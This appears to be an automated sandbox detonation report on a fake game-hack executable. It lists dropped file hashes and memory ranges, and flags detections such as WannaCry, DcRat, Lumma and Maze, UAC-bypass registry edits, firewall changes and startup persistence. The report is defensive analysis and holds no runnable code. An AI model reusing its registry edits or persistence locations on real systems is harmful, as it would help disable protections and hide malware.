memory/1228-600-0x0000000000400000-0x000000000041B000-memory.dmp

memory/3244-626-0x0000000000480000-0x000000000048F000-memory.dmp

memory/3244-636-0x0000000000400000-0x000000000042E000-memory.dmp

memory/2800-669-0x0000000000400000-0x000000000042E000-memory.dmp

memory/2800-693-0x00000000779C2000-0x00000000779C3000-memory.dmp

memory/2200-692-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4168-709-0x0000000000400000-0x0000000000416000-memory.dmp

C:\ProgramData\Microsoft\AppV\Setup\@[email protected]

MD5 2e882c93303f45ad267742603b2c11ad
SHA1 a1b003a6bf2f3004ae263679cada8bedc9819f4e
SHA256 ea42aa8fe3e968a9b9b9944f939a1ce22881abbc8379725dee2effd0f07dfa14
SHA512 e99280bc25c02653d13d8373a33382997e01531332319999e524a5ea0f803a34ad9d45c8b49ceee00fcd0db6e3e264f4d08d0407aff41391911031d9641a02a2

memory/2800-654-0x0000000000400000-0x000000000042E000-memory.dmp

memory/4900-638-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Windows\directx.sys

MD5 033a21d049cf5546fe0537f15435c440
SHA1 2da12b487030fb6300e992b474860444229dfad6
SHA256 bdb8157f9c7d593b90df878e8010f87c3d3f18108e43d2e50415b36c5536f3d1
SHA512 0a60df9963d3b5adb25347d1270163d7257dd0823a4435a7a07a3a0dfdeeef6e9b06d1101f672453b5cdc63bdbc18d4fd43e813fc6220a5c764a276190bcc224

memory/3244-637-0x0000000000400000-0x000000000042E000-memory.dmp

C:\Windows\directx.sys

MD5 f885d87964363b63dd02fa0764914e34
SHA1 f4040260ce0513af83c51129835e39fc1dc5b8cd
SHA256 6fe00c54216384322f650a0eee44b055009039ebb425ed0c07c458e32c97740f
SHA512 054af68bcf1bbfe0721fe210d9a56fa5d43bef94107c45c84e34edea6df9d05ea4d7e019a1c25d2e6568d903992164ed12f5e58dc7fb866956e0b41a56f61b1b

memory/4168-1098-0x0000000000400000-0x0000000000416000-memory.dmp

C:\Users\Admin\Desktop\10.exe

MD5 3a4338494abd06fd96f5fe4c25ded322
SHA1 fc090e8c6dc8f414596fab3e023c648f30b9b0a4
SHA256 9e75d48121cbcae79ebc1d96acbb97fb7497dd5de487d025bf9612601df4802a
SHA512 73b0bbc1fb4f779b1ac9286a9f6fcf4394bd3ed99e90428aea8f0e9d6873bc2121af34eaf859263aa137cb454fcca563d31c992589320d56123c7ce99ec2d6fc

memory/5484-1097-0x0000000000400000-0x000000000041B000-memory.dmp

memory/3416-1044-0x0000000000400000-0x000000000042F000-memory.dmp

C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\@[email protected]

MD5 0a4d7c2b1a97982cac25f281e462ce15
SHA1 fb3cde435fb4c148c0cd3d55a84e26a28d8f3d6d
SHA256 4d783a6343debd940fa6b5f4a51cd91415b6beb6221857579e2acef512d9a29f
SHA512 912df852cd9047986c8f5ae1bed392684b2725db027b26ef41628193897c76f665a162a6c0d70a2b52c9d5fb92455246fa8cc39fb991bf507807abeb73681d9a

C:\Users\Admin\Desktop\2.doc

MD5 5f99c00b42f775c6af985e4542acfc14
SHA1 2abc3115ce8c8968cde34379d81e55beb10465c7
SHA256 f1bb9814c406f8bccf7e7b84bb15a1fa310f7b668fb08f7aedbd012ab62a6435
SHA512 714c72a3996eb0b2eeda157e1da7f0a2618da917bcd9008d1aca81dc6eddcd347d742c462a147b64b1d71156e2c3935ee3b6cd30fe36830427fb5a3445f32e57

C:\Users\Admin\Downloads\@[email protected]

MD5 e8aef5833d1a2853578e751225cc9f9d
SHA1 a29711d7891b6c8864a404d292679f63cd9e8bdc
SHA256 344cd765dd6a3ce28e3c3cd55eabdc9c0b32490b59cf33bb4c8d13328c37a490
SHA512 36501a84fd71c02748a600b4dd89f4a8241631e96199f8d8bad314e606ed6edf5da193cd7a782813ec5dded572678fd315c1a88ddb3d8d9566be39d7a48826e2

C:\Users\Admin\Desktop\msg\m_filipino.wnry

MD5 7d0f6c06dd26f8b44d56be2f20a8b387
SHA1 84717cf3907b47a02d6bc227d761a3781b97b153
SHA256 b614c3513e269ed0b1f422651c584c7d47a49d064ec3f9069753033f0c64cf7d
SHA512 b99a81cf60e1ea7d4822bbd3c5299f847b2342fd06f7c9ae295743b4f0ee4aa308012b903b1956ac1c0269f010a2f1d6ec0761c9dd2ba97f355b93b88ca08fb5

memory/2820-1387-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5384-1009-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4900-634-0x0000000000570000-0x0000000000571000-memory.dmp

memory/3244-628-0x0000000000490000-0x0000000000491000-memory.dmp

memory/4712-624-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4436-604-0x0000000000490000-0x000000000049F000-memory.dmp

memory/3028-1511-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4460-1545-0x00007FFB2BC50000-0x00007FFB2BC60000-memory.dmp

memory/5696-1551-0x00000000005B0000-0x000000000060E000-memory.dmp

memory/5772-1550-0x0000000000820000-0x00000000008B4000-memory.dmp

memory/2864-1675-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/3564-1761-0x0000000000400000-0x0000000000705000-memory.dmp

memory/4460-1767-0x00007FFB2BC50000-0x00007FFB2BC60000-memory.dmp

memory/2968-1861-0x0000000072E20000-0x00000000735D0000-memory.dmp

memory/2820-1865-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5772-1866-0x0000000001090000-0x000000000109A000-memory.dmp

memory/5772-1908-0x0000000001070000-0x000000000107C000-memory.dmp

memory/1056-1900-0x0000000071380000-0x0000000071931000-memory.dmp

memory/4460-1913-0x00007FFB6BBD0000-0x00007FFB6BDC5000-memory.dmp

memory/4460-1912-0x00007FFB29460000-0x00007FFB29470000-memory.dmp

memory/5772-1916-0x00000000010B0000-0x00000000010BC000-memory.dmp

memory/5564-1927-0x0000000071380000-0x0000000071931000-memory.dmp

memory/1516-1920-0x00007FFB6BBD0000-0x00007FFB6BDC5000-memory.dmp

memory/5656-1919-0x00007FFB6BBD0000-0x00007FFB6BDC5000-memory.dmp

memory/5696-1930-0x00000000005B0000-0x000000000060E000-memory.dmp

memory/5868-1938-0x0000000071380000-0x0000000071931000-memory.dmp

memory/5772-1937-0x00007FFB4B930000-0x00007FFB4C3F1000-memory.dmp

memory/5868-1939-0x0000000000B70000-0x0000000000B80000-memory.dmp

memory/5772-1945-0x000000001B6B0000-0x000000001B6C0000-memory.dmp

memory/3040-1948-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/5868-1941-0x0000000071380000-0x0000000071931000-memory.dmp

memory/5868-1949-0x0000000000B70000-0x0000000000B80000-memory.dmp

memory/4460-1907-0x00007FFB6BBD0000-0x00007FFB6BDC5000-memory.dmp

memory/5696-1860-0x00000000005B0000-0x000000000060E000-memory.dmp

memory/5772-1826-0x0000000001060000-0x000000000106C000-memory.dmp

memory/2696-1770-0x0000000000400000-0x000000000068E000-memory.dmp

memory/4460-1674-0x00007FFB2BC50000-0x00007FFB2BC60000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-KCIOL.tmp\x2s443bc.cs1.tmp.exe

MD5 47f1b831df716d95c10ff34107c5f503
SHA1 697065c04e4fdcd35328d0cdf1d45d47133024f1
SHA256 1bfdc14b971709405c1e22342fc651c22e356d447ac59eb4ca56f11527cb7f11
SHA512 a2696935de76f2f7f69757b38d06fafa2491942da9b9b087c0099880942135a5ced710cd7a876fcc72820d6b5cec33be277246bd883e266e4b80493cd1caf3a3

memory/3692-1590-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/4460-1547-0x00007FFB2BC50000-0x00007FFB2BC60000-memory.dmp

memory/3040-1544-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/4460-1510-0x00007FFB2BC50000-0x00007FFB2BC60000-memory.dmp

memory/3028-1974-0x0000000000400000-0x000000000041B000-memory.dmp

memory/5564-1977-0x0000000071380000-0x0000000071931000-memory.dmp

memory/3040-1976-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/5772-1982-0x00007FFB4B930000-0x00007FFB4C3F1000-memory.dmp

memory/5424-1983-0x00007FFB4B930000-0x00007FFB4C3F1000-memory.dmp

memory/1056-1984-0x0000000000FC0000-0x0000000000FD0000-memory.dmp

memory/1056-1981-0x0000000071380000-0x0000000071931000-memory.dmp

memory/2388-1985-0x0000000071380000-0x0000000071931000-memory.dmp

memory/2388-1986-0x0000000000C30000-0x0000000000C40000-memory.dmp

C:\ProgramData\system.exe

MD5 e817d74d13c658890ff3a4c01ab44c62
SHA1 bf0b97392e7d56eee0b63dc65efff4db883cb0c7
SHA256 2945881f15e98a18d27108a29963988190853838f34faf3020e6c3c97342672d
SHA512 8d90ef308c1e0b7e01e7732e2cd819f07bfc1ef06e523efa81694ced75550c9f1be460fc9de412faeb96273a6492580402ab9c9538ed441fc26d96b6785e7815

memory/5424-1991-0x0000000001670000-0x0000000001680000-memory.dmp

memory/2696-1992-0x0000000000B00000-0x0000000000B01000-memory.dmp

memory/4436-599-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4436-579-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Tempspwak.exe

MD5 d459ac27cda1076af5b93ba8a573b992
SHA1 429406da9817debfbadd91dc7aecb9a682d8d9da
SHA256 c458b39ee9dacfece49933e4ceaaeab376448d8d56eb503ea519a8df8323bccb
SHA512 3f4569a5a21564b6c54df889f58022c88c6c71d415ad9f9203ead1ed518a8886d2c31a0cd7980fa47874dc5ad12c4e2b9c6946d8d643f06583c2f4c77c20500a

C:\Users\Admin\AppData\Local\Temp\3582-490\msedge.exe

MD5 07b6b5a25d10c3796000cc5729b3d642
SHA1 55addcd6fcedf76fadb74523a8fafcb52de00c07
SHA256 579a4c330d5c7b002545437f75d80bbc64550ce36aa01384eaba9e968ba5cf77
SHA512 765578b6c50e62968eb6bd11e7b46df5f7ec78db18d367e01b650558562cc37a85ea5840f8789ae96efac0701bd21e6a30c090914192d9527a58330eb87953ef

memory/3564-1995-0x00000000026D0000-0x00000000026D1000-memory.dmp

memory/1056-1999-0x0000000000FC0000-0x0000000000FD0000-memory.dmp

memory/5340-2004-0x0000000000400000-0x000000000041B000-memory.dmp

C:\odt\DECRYPT-FILES.txt

MD5 4bb2ba2f84baa09606e54e4a257ca077
SHA1 4d40eec72befb1269fd176d1f8cbed2012e8d923
SHA256 30ebc741b8369e2b5940ce0d6b1c02914ea415fac41496e4d3a01de014ba7e17
SHA512 7493226016c36374f22da01a4c66b4af78769b8fb59c0c9167e900e1963dd1dd4ed68ff97e00609bfe396bc90545e587f5ecdc9483fe49dc61704eddf223206f

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\_R_E_A_D___T_H_I_S___JY8JPEXE_.hta

MD5 2c9191c735bf5e25befd8119cd27e822
SHA1 b644e89887265f276f4cd59b7520925c701f24ef
SHA256 aeee74d0978524e231ab789d0e76e2ed959ffae0bdb6f54ba6020cb0e8c1e389
SHA512 5737230d1e4d0328935176f2002c709d249385c75ae6b6dcf760a1bfabed769493d5b9f5cf9ab2f3e8ee10d2aba2734abb2eb1fa734a4436351b5d565360b4c3

C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\_R_E_A_D___T_H_I_S___J1YHL18_.txt

MD5 d63f235215ba1d55adda7029a9b6cef0
SHA1 a36498f7535d791439b924de97e2c8dd1e5826c8
SHA256 8b3dfe208c8a29efcaabd2a8628bde990151b89829e800b82a1ba2b47c6ee212
SHA512 6f62b9fa3f932d6e1e6b9fe0cd1ea88a77a6861845fc0d5441fe6431a3b1bbe4b5d088a8d5e2b609c94110ec03c41d47e637b76420d4a1edd265f005d398cab9

memory/5424-3029-0x00007FFB4B930000-0x00007FFB4C3F1000-memory.dmp

memory/3244-3404-0x0000000000400000-0x0000000000458000-memory.dmp

memory/3244-3411-0x0000000000400000-0x0000000000458000-memory.dmp

C:\Users\Default\Desktop\@[email protected]

MD5 94dc98f6cf04a5a1cee3fc8c208881ed
SHA1 0e50e37e962a9abcf2ed30f12734cf7d6a0925b5
SHA256 424f00a8883f0b653c203198bb364566c4b8d307093113f81bfc8a8dfe35018b
SHA512 d587e4be65a7b38c1c7fe8fc40bbce6368b7c1e82282db96fe2ed4ff09a281132237102ba4c0e6ccdcd5eec7382aa425073f5745bc5798286d170368634ef14f

memory/6012-3439-0x00007FFB4B6E0000-0x00007FFB4C1A1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\images.exe

MD5 72657c0b91667ff91411bd5368ec67bf
SHA1 3d5ba99ff10ff47acb4e1adc8375c696393a80d2
SHA256 7dda30378a4b802ea476d8b8242c3125ed1c2dcee0745866fc7af521abe59b1f
SHA512 09554a24ed572da97401936ccdd6a662454b3ce8feaa821127d2953d66abc97bcd4c050d27bedda41d2437f3085d97425e3b91baec26dfe1ad90680145e39497

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\svchost.exe

MD5 d63c259f30cd4da0e1d0d7b548f57e5a
SHA1 dbc47dccd3c2f9b3fa32d000b011d4ed39db9373
SHA256 541bb12ce71802410f47eb486d75a66fcdcfd82ed58a8e744e73b1a250077758
SHA512 896f30be09b19d07109f72842ace34fada2d4b349c9097139c3421e9abe755a8215f2ddc974ddf42ac8e86c0395f9a492e639b2e89d39581d27650aad3737b74

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\Winlog.exe

MD5 f05c694a114f51a3ef0db7f93f777711
SHA1 ac5e548ed226ee56cc643a8c2f4eb2ce5877f8dc
SHA256 0af0b4bffa67145e4e5ecd2321bb7790e9c14ed802a7984798fc7c00b6763207
SHA512 8a72c139562723cbd19b4e74c711714f8e85c18a3de365d7cf936c4ef69506d881db8c3851a477de90eaaa4a82cc96eac25929e4b012452e18841dd8c372ab4b

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n0smbvh5.sje.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows\directx.sys

MD5 bc007d29b77c5d40fee9c741117fd01c
SHA1 bf1dd68ea903f8ae1e6f6af1a6547dace19cf458
SHA256 927135d920363fc7b46999cc534603f87081e0f5e0d4cabca317457f1d809d06
SHA512 900c4c4d7d73b5ef0f18ba2010177789f77e62ff342cf77bd3aa7c086dc52cf2f5da44391b26afb9cebd830c50932dcc7ac87243e9813a2f71de59cdc1a32cfb

C:\Windows\directx.sys

MD5 08fa7453a25f3a52779a7aa8fb5212b9
SHA1 1fc456299905503062286e3745da761f633c03f6
SHA256 be881e64fa5f2e2ef533f914a44603f2436a87af2fefbed48f78edd78ae7cb9c
SHA512 fc61677cce474511a84806968b65614aee3034e8522c1376f6aa3100da204a7ffb41c1a6e467a5ef556339590ee69e9ae23edd579f754a5f9538652cc77f6b80

C:\Windows\SysWOW64\setting.ini

MD5 4899724bd6d4f00dd736debaa4f9fe4f
SHA1 24ccbc4bd9148a2b862920c9bbdbfaad35ffdb51
SHA256 415a201301b99b1b9cfeb69520d0b3b6b6caa25959901d008fabf9d8ce957540
SHA512 78a9809ba0e03bfc0d53ccdfd0fa1eaf9d507956fb7378605c80207666b1b5ec3f9ccb90bb7ca4d28ad0c1ba4ba3548c032e98240da6754ccbec9c49f3a8f3ef

C:\Windows\directx.sys

MD5 38e49808f35a33de0bcf226babe3bcd9
SHA1 a9e46a9cd2c2ddd39d78efe9069bc2cdc33caaae
SHA256 80878b915291940b97fc067a52a0914db6be22fa33e535297d014ac482fec4a1
SHA512 bcd4d8304a933860229a21abda66f99b4c05e70c018875c7f913ce61e873e5b5ba3447c723ff79f957400ce0e33ab0f4b95e515518f072f07bcb35fbcb3e54ba

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\a5d66a7d45ad000c9925a7cc663df2a8944fcd5cf8de64533ea36f545599ca39.exe

MD5 59504f549a4851aaae5cf436f09acf97
SHA1 87074c018ce0fc7150757dbe477dbc488d098279
SHA256 e618f977366d917e05358c693002d785938f019a1c69fbd2997e3943b186ef60
SHA512 f7542ffe2d4937a0ae4a5cc3aa3ae58b2ddabc3d282ad2168eb42fab4ebd8a8775ea0b86cf3c0b186fe3acdf43114bcca3113b72c28606a6b7341ca2fd5bf1c2

C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_74E841258D264E0EACAC62677F65C3EA.dat

MD5 4c9d2511765153060ee5250b08268e43
SHA1 0d03807bc7c15cfd6edd5e32b2f61b9002469a50
SHA256 88cb9825dc8910fe6f2696040c78b1d8218ae444843596baf1f12d8c09639b14
SHA512 bd8b3f6733b212da4fbfdf665c6a876241e5d772e69b5d33cfa42b8b5c660087bababe8a5582431a30287c599993253e554885238857521603caaf73b41867fd

C:\Windows\directx.sys

MD5 9c23d307e726201708a9b064f7bdfb85
SHA1 5a093a4754dce36f416c41942773ee62cca248ac
SHA256 e015c2d92c0091bed5d818244c893b18f5d9294ea5d9438c6d0f63927f7f6b18
SHA512 ef55953501ea0ab4989a21f63441d94c3b0982c3e4336de7b7168a5963a3e50d93891e0d07a1767fdcd0b759048915960aa2da4855a04cfa4e83cebe53650d0e

C:\Users\Admin\AppData\Local\Temp\Qvswppeorgu.tmp

MD5 90a1d4b55edf36fa8b4cc6974ed7d4c4
SHA1 aba1b8d0e05421e7df5982899f626211c3c4b5c1
SHA256 7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c
SHA512 ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

C:\Users\Admin\AppData\Local\Temp\Njbshple.tmp

MD5 9618e15b04a4ddb39ed6c496575f6f95
SHA1 1c28f8750e5555776b3c80b187c5d15a443a7412
SHA256 a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512 f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

Analysis: behavioral4

Detonation Overview

Submitted

2024-01-09 22:08

Reported

2024-01-09 22:30

Platform

win11-20231222-en

Max time kernel

581s

Max time network

589s

Command Line

"C:\Users\Admin\AppData\Local\Temp\krunker.iohacks.exe"

Signatures

DcRat

rat infostealer dcrat

Detect Neshta payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

HawkEye

keylogger trojan stealer spyware hawkeye

Lumma Stealer

stealer lumma

Maze

trojan ransomware maze

Neshta

persistence spyware neshta

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Ramnit

trojan spyware stealer worm banker ramnit

Troldesh, Shade, Encoder.858

ransomware trojan troldesh

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\Desktop\6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Program Files\Java\jdk-1.8\include\bot.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Program Files\Java\jdk-1.8\include\bot.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Program Files\Java\jdk-1.8\include\bot.exe N/A

Wannacry

ransomware worm wannacry

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Deletes shadow copies

ransomware

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\drivers\en-US\wfplwfs.sys.mui.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\drivers\en-US.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\gm.dls.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\en-US.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\en-US.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\drivers\en-US\ndiscap.sys.mui.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\UMDF.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\drivers\en-US\ndiscap.sys.mui.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\afunix.sys.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\drivers\afunix.sys.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\drivers\gm.dls.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\drivers\en-US\NdisImPlatform.sys.mui.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\drivers\afunix.sys.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\drivers\gm.dls.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\drivers\gmreadme.txt.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\en-US\ndiscap.sys.mui.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\drivers\en-US\wfplwfs.sys.mui.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\drivers\UMDF\en-US.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\UMDF\en-US.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\drivers\en-US\NdisImPlatform.sys.mui.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\drivers\gmreadme.txt.Cyborg Builder Ransomware.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\en-US\wfplwfs.sys.mui.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Windows\SysWOW64\drivers\en-US.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\gmreadme.txt.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\en-US\NdisImPlatform.sys.mui.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD7DB3.tmp C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\6ce70cc8365b721.tmp C:\Windows\SysWOW64\netsh.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\802f813d3810aa536753efbd3390b541.exe C:\PROGRA~3\system.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_R_E_A_D___T_H_I_S___BWR0F_.hta.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD7D9C.tmp C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt C:\Windows\SysWOW64\netsh.exe N/A
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\word\startup\decrypt-files.txt C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File created \??\c:\users\admin\appdata\roaming\microsoft\word\startup\_R_E_A_D___T_H_I_S___6NWUK75_.txt C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\_R_E_A_D___T_H_I_S___6NWUK75_.txt.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6ce70cc8365b721.tmp C:\Windows\SysWOW64\netsh.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\DECRYPT-FILES.txt C:\Windows\SysWOW64\netsh.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\UqHLX7zx6p.8834.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\802f813d3810aa536753efbd3390b541.exe C:\PROGRA~3\system.exe N/A
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\word\startup\ C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File created \??\c:\users\admin\appdata\roaming\microsoft\word\startup\_R_E_A_D___T_H_I_S___BWR0F_.hta C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\802f813d3810aa536753efbd3390b541.exe.Cyborg Builder Ransomware C:\Windows\SysWOW64\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe N/A
N/A N/A C:\Users\Admin\Desktop\1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\x2s443bc.cs1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NJVTG.tmp\ska2pwej.aeh.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QAP6P.tmp\x2s443bc.cs1.tmp N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Desktop\10.exe N/A
N/A N/A C:\Windows\svchost.com N/A
